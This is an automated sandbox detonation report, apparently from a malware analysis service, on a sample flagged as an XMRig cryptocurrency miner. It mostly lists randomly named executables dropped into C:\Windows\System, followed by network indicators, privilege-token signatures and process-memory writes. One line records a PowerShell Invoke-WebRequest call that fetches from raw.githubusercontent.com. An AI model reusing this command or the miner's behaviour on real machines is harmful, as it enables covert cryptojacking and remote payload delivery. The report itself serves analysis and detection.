C:\Windows\System\sjsLJJQ.exe

C:\Windows\System\sjsLJJQ.exe

C:\Windows\System\qVUlprA.exe

C:\Windows\System\qVUlprA.exe

C:\Windows\System\WgaKRWU.exe

C:\Windows\System\WgaKRWU.exe

C:\Windows\System\VAwkwoZ.exe

C:\Windows\System\VAwkwoZ.exe

C:\Windows\System\iFAOMvH.exe

C:\Windows\System\iFAOMvH.exe

C:\Windows\System\fWTFSCP.exe

C:\Windows\System\fWTFSCP.exe

C:\Windows\System\gALtOzk.exe

C:\Windows\System\gALtOzk.exe

C:\Windows\System\RivxOWn.exe

C:\Windows\System\RivxOWn.exe

C:\Windows\System\CWADbwb.exe

C:\Windows\System\CWADbwb.exe

C:\Windows\System\GJlFVxO.exe

C:\Windows\System\GJlFVxO.exe

C:\Windows\System\EbnWLmW.exe

C:\Windows\System\EbnWLmW.exe

C:\Windows\System\CQUNRXR.exe

C:\Windows\System\CQUNRXR.exe

C:\Windows\System\KqvbJgm.exe

C:\Windows\System\KqvbJgm.exe

C:\Windows\System\QPklXOf.exe

C:\Windows\System\QPklXOf.exe

C:\Windows\System\zdCAbOn.exe

C:\Windows\System\zdCAbOn.exe

C:\Windows\System\nSklFmx.exe

C:\Windows\System\nSklFmx.exe

C:\Windows\System\hUDeGSr.exe

C:\Windows\System\hUDeGSr.exe

C:\Windows\System\Ikkfjib.exe

C:\Windows\System\Ikkfjib.exe

C:\Windows\System\wvCTbXP.exe

C:\Windows\System\wvCTbXP.exe

C:\Windows\System\KreNPwG.exe

C:\Windows\System\KreNPwG.exe

C:\Windows\System\GyjoKdy.exe

C:\Windows\System\GyjoKdy.exe

C:\Windows\System\WAOgZeA.exe

C:\Windows\System\WAOgZeA.exe

C:\Windows\System\BRZWJAd.exe

C:\Windows\System\BRZWJAd.exe

C:\Windows\System\YMNCljz.exe

C:\Windows\System\YMNCljz.exe

C:\Windows\System\PuXAXCe.exe

C:\Windows\System\PuXAXCe.exe

C:\Windows\System\TtFueVK.exe

C:\Windows\System\TtFueVK.exe

C:\Windows\System\YlLHCaP.exe

C:\Windows\System\YlLHCaP.exe

C:\Windows\System\sJNjTML.exe

C:\Windows\System\sJNjTML.exe

C:\Windows\System\YrYiTEi.exe

C:\Windows\System\YrYiTEi.exe

C:\Windows\System\JtfWklg.exe

C:\Windows\System\JtfWklg.exe

C:\Windows\System\EdzWNqq.exe

C:\Windows\System\EdzWNqq.exe

C:\Windows\System\eETOQlo.exe

C:\Windows\System\eETOQlo.exe

C:\Windows\System\sFKWhTG.exe

C:\Windows\System\sFKWhTG.exe

C:\Windows\System\AaZGqbK.exe

C:\Windows\System\AaZGqbK.exe

C:\Windows\System\scCKolY.exe

C:\Windows\System\scCKolY.exe

C:\Windows\System\wsWowTH.exe

C:\Windows\System\wsWowTH.exe

C:\Windows\System\dsEUhZS.exe

C:\Windows\System\dsEUhZS.exe

C:\Windows\System\ihTMqyR.exe

C:\Windows\System\ihTMqyR.exe

C:\Windows\System\XeIFVYA.exe

C:\Windows\System\XeIFVYA.exe

C:\Windows\System\iwErLjn.exe

C:\Windows\System\iwErLjn.exe

C:\Windows\System\UtVFuMz.exe

C:\Windows\System\UtVFuMz.exe

C:\Windows\System\ToELdTL.exe

C:\Windows\System\ToELdTL.exe

C:\Windows\System\ZyLKqIz.exe

C:\Windows\System\ZyLKqIz.exe

C:\Windows\System\GVjyAxA.exe

C:\Windows\System\GVjyAxA.exe

C:\Windows\System\BmLhWCi.exe

C:\Windows\System\BmLhWCi.exe

C:\Windows\System\VihagkU.exe

C:\Windows\System\VihagkU.exe

C:\Windows\System\BGpBfMs.exe

C:\Windows\System\BGpBfMs.exe

C:\Windows\System\loewGHH.exe

C:\Windows\System\loewGHH.exe

C:\Windows\System\VYrlBEV.exe

C:\Windows\System\VYrlBEV.exe

C:\Windows\System\hIUNQaS.exe

C:\Windows\System\hIUNQaS.exe

C:\Windows\System\PAnRcfd.exe

C:\Windows\System\PAnRcfd.exe

C:\Windows\System\pEaaMBy.exe

C:\Windows\System\pEaaMBy.exe

C:\Windows\System\TIkgURE.exe

C:\Windows\System\TIkgURE.exe

C:\Windows\System\LgTbSLN.exe

C:\Windows\System\LgTbSLN.exe

C:\Windows\System\yNHauWH.exe

C:\Windows\System\yNHauWH.exe

C:\Windows\System\CDWWusJ.exe

C:\Windows\System\CDWWusJ.exe

C:\Windows\System\NdDteFe.exe

C:\Windows\System\NdDteFe.exe

C:\Windows\System\wCUxPVh.exe

C:\Windows\System\wCUxPVh.exe

C:\Windows\System\ajPrOxm.exe

C:\Windows\System\ajPrOxm.exe

C:\Windows\System\QdhzSwK.exe

C:\Windows\System\QdhzSwK.exe

C:\Windows\System\qvcpzpw.exe

C:\Windows\System\qvcpzpw.exe

C:\Windows\System\EuMDgcL.exe

C:\Windows\System\EuMDgcL.exe

C:\Windows\System\ZjfDVTu.exe

C:\Windows\System\ZjfDVTu.exe

C:\Windows\System\NqCqSNC.exe

C:\Windows\System\NqCqSNC.exe

C:\Windows\System\VzUypSc.exe

C:\Windows\System\VzUypSc.exe

C:\Windows\System\rwuLXfE.exe

C:\Windows\System\rwuLXfE.exe

C:\Windows\System\TOaRmYI.exe

C:\Windows\System\TOaRmYI.exe

C:\Windows\System\PaYMxUe.exe

C:\Windows\System\PaYMxUe.exe

C:\Windows\System\lLzuyFA.exe

C:\Windows\System\lLzuyFA.exe

C:\Windows\System\kfzoEcW.exe

C:\Windows\System\kfzoEcW.exe

C:\Windows\System\tHEuQST.exe

C:\Windows\System\tHEuQST.exe

C:\Windows\System\nqAjznm.exe

C:\Windows\System\nqAjznm.exe

C:\Windows\System\LFvtHKh.exe

C:\Windows\System\LFvtHKh.exe

C:\Windows\System\aVIPPJW.exe

C:\Windows\System\aVIPPJW.exe

C:\Windows\System\ClCRWoz.exe

C:\Windows\System\ClCRWoz.exe

C:\Windows\System\FDFsnIS.exe

C:\Windows\System\FDFsnIS.exe

C:\Windows\System\liLGcoj.exe

C:\Windows\System\liLGcoj.exe

C:\Windows\System\fWWtrAO.exe

C:\Windows\System\fWWtrAO.exe

C:\Windows\System\pDBdWVC.exe

C:\Windows\System\pDBdWVC.exe

C:\Windows\System\dAeQNhb.exe

C:\Windows\System\dAeQNhb.exe

C:\Windows\System\HIIbYZA.exe

C:\Windows\System\HIIbYZA.exe

C:\Windows\System\OEHOMcU.exe

C:\Windows\System\OEHOMcU.exe

C:\Windows\System\JtehAoX.exe

C:\Windows\System\JtehAoX.exe

C:\Windows\System\TewCsdv.exe

C:\Windows\System\TewCsdv.exe

C:\Windows\System\iVaAhOw.exe

C:\Windows\System\iVaAhOw.exe

C:\Windows\System\YdmVxvc.exe

C:\Windows\System\YdmVxvc.exe

C:\Windows\System\chkhZLD.exe

C:\Windows\System\chkhZLD.exe

C:\Windows\System\VbDIUNo.exe

C:\Windows\System\VbDIUNo.exe

C:\Windows\System\TJYKKHu.exe

C:\Windows\System\TJYKKHu.exe

C:\Windows\System\uEeyQAc.exe

C:\Windows\System\uEeyQAc.exe

C:\Windows\System\ZDpzkFT.exe

C:\Windows\System\ZDpzkFT.exe

C:\Windows\System\ihjdsnm.exe

C:\Windows\System\ihjdsnm.exe

C:\Windows\System\IWeBEpF.exe

C:\Windows\System\IWeBEpF.exe

C:\Windows\System\WUbJXnh.exe

C:\Windows\System\WUbJXnh.exe

C:\Windows\System\zsOFyDu.exe

C:\Windows\System\zsOFyDu.exe

C:\Windows\System\sYcMpHv.exe

C:\Windows\System\sYcMpHv.exe

C:\Windows\System\icewniz.exe

C:\Windows\System\icewniz.exe

C:\Windows\System\ubPobzr.exe

C:\Windows\System\ubPobzr.exe

C:\Windows\System\PNzIkfm.exe

C:\Windows\System\PNzIkfm.exe

C:\Windows\System\evZCjaq.exe

C:\Windows\System\evZCjaq.exe

C:\Windows\System\kaxxMsm.exe

C:\Windows\System\kaxxMsm.exe

C:\Windows\System\HEKQiLr.exe

C:\Windows\System\HEKQiLr.exe

C:\Windows\System\KtTGKRJ.exe

C:\Windows\System\KtTGKRJ.exe

C:\Windows\System\DrZYDYj.exe

C:\Windows\System\DrZYDYj.exe

C:\Windows\System\XXaften.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 13:05

Reported

2024-06-13 13:08

Platform

win10v2004-20240508-en

Max time kernel

62s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1632 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\nzVZUQA.exe
PID 1632 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TVcThEj.exe
PID 1632 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\TVcThEj.exe
PID 1632 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SWEYvlD.exe
PID 1632 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SWEYvlD.exe
PID 1632 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SOqYhVS.exe
PID 1632 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SOqYhVS.exe
PID 1632 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\vPfDbLc.exe
PID 1632 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\vPfDbLc.exe
PID 1632 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\fPKofCZ.exe
PID 1632 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\fPKofCZ.exe
PID 1632 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ohokUdJ.exe
PID 1632 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ohokUdJ.exe
PID 1632 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ENTEtSo.exe
PID 1632 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ENTEtSo.exe
PID 1632 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpRceJo.exe
PID 1632 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\SpRceJo.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\ljnvEOY.exe

C:\Windows\System\ljnvEOY.exe

C:\Windows\System\yWcJdkc.exe

C:\Windows\System\yWcJdkc.exe

C:\Windows\System\pkPdNyz.exe

C:\Windows\System\pkPdNyz.exe

C:\Windows\System\mozuANC.exe

C:\Windows\System\mozuANC.exe

C:\Windows\System\kcgRozK.exe

C:\Windows\System\kcgRozK.exe

C:\Windows\System\mJEduEe.exe

C:\Windows\System\mJEduEe.exe

C:\Windows\System\lTXcZVW.exe

C:\Windows\System\lTXcZVW.exe

C:\Windows\System\UmhhYEV.exe

C:\Windows\System\UmhhYEV.exe

C:\Windows\System\ZYpUfgg.exe

C:\Windows\System\ZYpUfgg.exe

C:\Windows\System\FCsnXqx.exe

C:\Windows\System\FCsnXqx.exe

C:\Windows\System\WohRoaX.exe

C:\Windows\System\WohRoaX.exe

C:\Windows\System\wyCrOfd.exe

C:\Windows\System\wyCrOfd.exe

C:\Windows\System\IaFKxlG.exe

C:\Windows\System\IaFKxlG.exe

C:\Windows\System\cpPSdnG.exe

C:\Windows\System\cpPSdnG.exe

C:\Windows\System\bMFsqjN.exe

C:\Windows\System\bMFsqjN.exe

C:\Windows\System\AOYPrdJ.exe

C:\Windows\System\AOYPrdJ.exe

C:\Windows\System\HByAfrF.exe

C:\Windows\System\HByAfrF.exe

C:\Windows\System\QVQCTqR.exe

C:\Windows\System\QVQCTqR.exe

C:\Windows\System\MrriRGh.exe

C:\Windows\System\MrriRGh.exe

C:\Windows\System\oYeeLYe.exe

C:\Windows\System\oYeeLYe.exe

C:\Windows\System\PCNTBUH.exe

C:\Windows\System\PCNTBUH.exe

C:\Windows\System\Qottryt.exe

C:\Windows\System\Qottryt.exe

C:\Windows\System\QfuHfZR.exe

C:\Windows\System\QfuHfZR.exe

C:\Windows\System\pGBfELj.exe

C:\Windows\System\pGBfELj.exe

C:\Windows\System\hBCpyGA.exe

C:\Windows\System\hBCpyGA.exe

C:\Windows\System\rpEqQdb.exe

C:\Windows\System\rpEqQdb.exe

C:\Windows\System\KNLWhnL.exe

C:\Windows\System\KNLWhnL.exe

C:\Windows\System\EcxUTsH.exe

C:\Windows\System\EcxUTsH.exe

C:\Windows\System\EZrnfeB.exe

C:\Windows\System\EZrnfeB.exe

C:\Windows\System\LTOJNAk.exe

C:\Windows\System\LTOJNAk.exe

C:\Windows\System\hffTKdQ.exe

C:\Windows\System\hffTKdQ.exe

C:\Windows\System\zMdAemn.exe

C:\Windows\System\zMdAemn.exe

C:\Windows\System\ddYJAEt.exe

C:\Windows\System\ddYJAEt.exe

C:\Windows\System\eTsGirw.exe

C:\Windows\System\eTsGirw.exe

C:\Windows\System\evCaicq.exe

C:\Windows\System\evCaicq.exe

C:\Windows\System\WwoSkXF.exe

C:\Windows\System\WwoSkXF.exe

C:\Windows\System\VofdaBV.exe

C:\Windows\System\VofdaBV.exe

C:\Windows\System\htYZdxK.exe

C:\Windows\System\htYZdxK.exe

C:\Windows\System\UsKmrNG.exe

C:\Windows\System\UsKmrNG.exe

C:\Windows\System\VDFSzEB.exe

C:\Windows\System\VDFSzEB.exe

C:\Windows\System\RLSGgAn.exe

C:\Windows\System\RLSGgAn.exe

C:\Windows\System\LUUPMvf.exe

C:\Windows\System\LUUPMvf.exe

C:\Windows\System\PkKMlny.exe

C:\Windows\System\PkKMlny.exe

C:\Windows\System\pWvtYAo.exe

C:\Windows\System\pWvtYAo.exe

C:\Windows\System\xwIIhQB.exe

C:\Windows\System\xwIIhQB.exe

C:\Windows\System\DUPEJxV.exe

C:\Windows\System\DUPEJxV.exe

C:\Windows\System\vlrwnRv.exe

C:\Windows\System\vlrwnRv.exe

C:\Windows\System\HDdIfGf.exe

C:\Windows\System\HDdIfGf.exe

C:\Windows\System\NCmzWVh.exe

C:\Windows\System\NCmzWVh.exe

C:\Windows\System\vcolwCL.exe

C:\Windows\System\vcolwCL.exe

C:\Windows\System\FejFicM.exe

C:\Windows\System\FejFicM.exe

C:\Windows\System\ZorgOjE.exe

C:\Windows\System\ZorgOjE.exe

C:\Windows\System\KIihWsW.exe

C:\Windows\System\KIihWsW.exe

C:\Windows\System\MRZXIMg.exe

C:\Windows\System\MRZXIMg.exe

C:\Windows\System\RdkJBCT.exe

C:\Windows\System\RdkJBCT.exe

C:\Windows\System\OVSiUOH.exe

C:\Windows\System\OVSiUOH.exe

C:\Windows\System\kmBLYMQ.exe

C:\Windows\System\kmBLYMQ.exe

C:\Windows\System\pYwuGaB.exe

C:\Windows\System\pYwuGaB.exe

C:\Windows\System\jraxrLC.exe

C:\Windows\System\jraxrLC.exe

C:\Windows\System\RCBpTPJ.exe

C:\Windows\System\RCBpTPJ.exe

C:\Windows\System\iigIFQF.exe

C:\Windows\System\iigIFQF.exe

C:\Windows\System\SegGdLU.exe

C:\Windows\System\SegGdLU.exe

C:\Windows\System\RpJbaAv.exe

C:\Windows\System\RpJbaAv.exe

C:\Windows\System\YEQiVKH.exe

C:\Windows\System\YEQiVKH.exe

C:\Windows\System\koQKBnQ.exe

C:\Windows\System\koQKBnQ.exe

C:\Windows\System\CkJTVDW.exe

C:\Windows\System\CkJTVDW.exe

C:\Windows\System\HbMzjDG.exe

C:\Windows\System\HbMzjDG.exe

C:\Windows\System\zsIBRqY.exe

C:\Windows\System\zsIBRqY.exe

C:\Windows\System\Jrlvhyl.exe

C:\Windows\System\Jrlvhyl.exe

C:\Windows\System\PKQyFEs.exe

C:\Windows\System\PKQyFEs.exe

C:\Windows\System\hvfOxQM.exe

C:\Windows\System\hvfOxQM.exe

C:\Windows\System\uLNGTJR.exe

C:\Windows\System\uLNGTJR.exe

C:\Windows\System\HsxOhEm.exe

C:\Windows\System\HsxOhEm.exe

C:\Windows\System\KstsFtN.exe

C:\Windows\System\KstsFtN.exe

C:\Windows\System\EGjBpzq.exe

C:\Windows\System\EGjBpzq.exe

C:\Windows\System\KhpxBgj.exe

C:\Windows\System\KhpxBgj.exe

C:\Windows\System\LDKzxSx.exe

C:\Windows\System\LDKzxSx.exe

C:\Windows\System\blMwnSu.exe

C:\Windows\System\blMwnSu.exe

C:\Windows\System\hafNGJc.exe

C:\Windows\System\hafNGJc.exe

C:\Windows\System\eouGnbm.exe

C:\Windows\System\eouGnbm.exe

C:\Windows\System\MBQqwNt.exe

C:\Windows\System\MBQqwNt.exe

C:\Windows\System\VsGxaNL.exe

C:\Windows\System\VsGxaNL.exe

C:\Windows\System\aAwtBJS.exe

C:\Windows\System\aAwtBJS.exe

C:\Windows\System\dCsHmUn.exe

C:\Windows\System\dCsHmUn.exe

C:\Windows\System\OPkbDWO.exe

C:\Windows\System\OPkbDWO.exe

C:\Windows\System\icqvVFP.exe

C:\Windows\System\icqvVFP.exe

C:\Windows\System\zaZGcAh.exe

C:\Windows\System\zaZGcAh.exe

C:\Windows\System\SiJWMQp.exe

C:\Windows\System\SiJWMQp.exe

C:\Windows\System\DYjBzti.exe

C:\Windows\System\DYjBzti.exe

C:\Windows\System\eqHofGY.exe

C:\Windows\System\eqHofGY.exe

C:\Windows\System\CxqXxjp.exe

C:\Windows\System\CxqXxjp.exe

C:\Windows\System\iNgyYWY.exe

C:\Windows\System\iNgyYWY.exe

C:\Windows\System\ULtoPEP.exe

C:\Windows\System\ULtoPEP.exe

C:\Windows\System\MupajTd.exe

C:\Windows\System\MupajTd.exe

C:\Windows\System\XZdIJjS.exe

C:\Windows\System\XZdIJjS.exe

C:\Windows\System\zMGIDnZ.exe

C:\Windows\System\zMGIDnZ.exe

C:\Windows\System\ZbScDrI.exe

C:\Windows\System\ZbScDrI.exe

C:\Windows\System\yJqMfOb.exe

C:\Windows\System\yJqMfOb.exe

C:\Windows\System\mvhXejf.exe

C:\Windows\System\mvhXejf.exe

C:\Windows\System\uSBWpAP.exe

C:\Windows\System\uSBWpAP.exe

C:\Windows\System\sGqYdGP.exe

C:\Windows\System\sGqYdGP.exe

C:\Windows\System\NZbzoKd.exe

C:\Windows\System\NZbzoKd.exe

C:\Windows\System\bojGvJC.exe

C:\Windows\System\bojGvJC.exe

C:\Windows\System\eYOkzDb.exe

C:\Windows\System\eYOkzDb.exe

C:\Windows\System\CdGBuwq.exe

C:\Windows\System\CdGBuwq.exe

C:\Windows\System\nBLsGor.exe

C:\Windows\System\nBLsGor.exe

C:\Windows\System\BBrFCoN.exe

C:\Windows\System\BBrFCoN.exe

C:\Windows\System\IuTmmqa.exe

C:\Windows\System\IuTmmqa.exe

C:\Windows\System\SZsmtuP.exe

C:\Windows\System\SZsmtuP.exe

C:\Windows\System\zEXnxgY.exe

C:\Windows\System\zEXnxgY.exe

C:\Windows\System\rGgnzkp.exe

C:\Windows\System\rGgnzkp.exe

C:\Windows\System\UijNOtl.exe

C:\Windows\System\UijNOtl.exe

C:\Windows\System\xqMTNSm.exe

C:\Windows\System\xqMTNSm.exe

C:\Windows\System\LiHxxEL.exe

C:\Windows\System\LiHxxEL.exe

C:\Windows\System\GvJgIgy.exe

C:\Windows\System\GvJgIgy.exe

C:\Windows\System\hudlysk.exe

C:\Windows\System\hudlysk.exe

C:\Windows\System\IXNvEsK.exe

C:\Windows\System\IXNvEsK.exe

C:\Windows\System\zBWiOjK.exe

C:\Windows\System\zBWiOjK.exe

C:\Windows\System\WvuHCJW.exe

C:\Windows\System\WvuHCJW.exe

C:\Windows\System\KXyFwyP.exe

C:\Windows\System\KXyFwyP.exe

C:\Windows\System\yGghKsc.exe

C:\Windows\System\yGghKsc.exe

C:\Windows\System\tmdqeDa.exe

C:\Windows\System\tmdqeDa.exe

C:\Windows\System\NwZTukZ.exe

C:\Windows\System\NwZTukZ.exe

C:\Windows\System\muZssVm.exe

C:\Windows\System\muZssVm.exe

C:\Windows\System\ZkSSgQE.exe

C:\Windows\System\ZkSSgQE.exe

C:\Windows\System\zOehzmJ.exe

C:\Windows\System\zOehzmJ.exe

C:\Windows\System\gsLPIsE.exe

C:\Windows\System\gsLPIsE.exe

C:\Windows\System\SmPiMtd.exe

C:\Windows\System\SmPiMtd.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp

Files
